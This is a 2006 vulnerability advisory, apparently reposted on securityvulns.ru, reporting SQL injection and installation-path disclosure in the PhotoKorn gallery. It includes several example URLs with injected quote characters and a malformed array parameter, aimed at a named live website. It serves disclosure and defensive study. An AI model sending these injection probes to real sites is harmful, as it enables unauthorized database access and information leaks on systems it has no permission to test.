Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities

  Xss in Wbb 2.3.4

  Contrexx CMS Xss Vuln

  XSS in AShop

From:Cyber Lords <fear_(at)_cyberlords.net>
Date:19.03.2006
Subject:SQL-injection and XSS in photokorn gallery


Advisory: SQL-injection and XSS in photokorn gallery

Home Page: http://www.telekorn.com

Уязвимость/Vulnerability:
SQL-injection

Уязвимый скрипт/Vulnerable script: search.php

http://www.stockvault.net/gallery/search.php?action=search&type=detail&wh
ere
[]=keywords'&keyword=dotted

Раскрытие установочного пути/Exposure of installation path:

Уязвимый скрипт/Vulnerable script:index.php, download.php

http://www.stockvault.net/gallery/index.php?action=showpic&cat=64&pic=330
4
'

http://www.stockvault.net/gallery/index.php?action=showgal&cat=39'

http://www.stockvault.net/gallery/index.php?action=showpic&cat=34&pic=1'


http://www.stockvault.net/gallery/download.php?cat=34&pic=1'

--------------------------
Cyber Lords Team
www.cyberlords.net

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru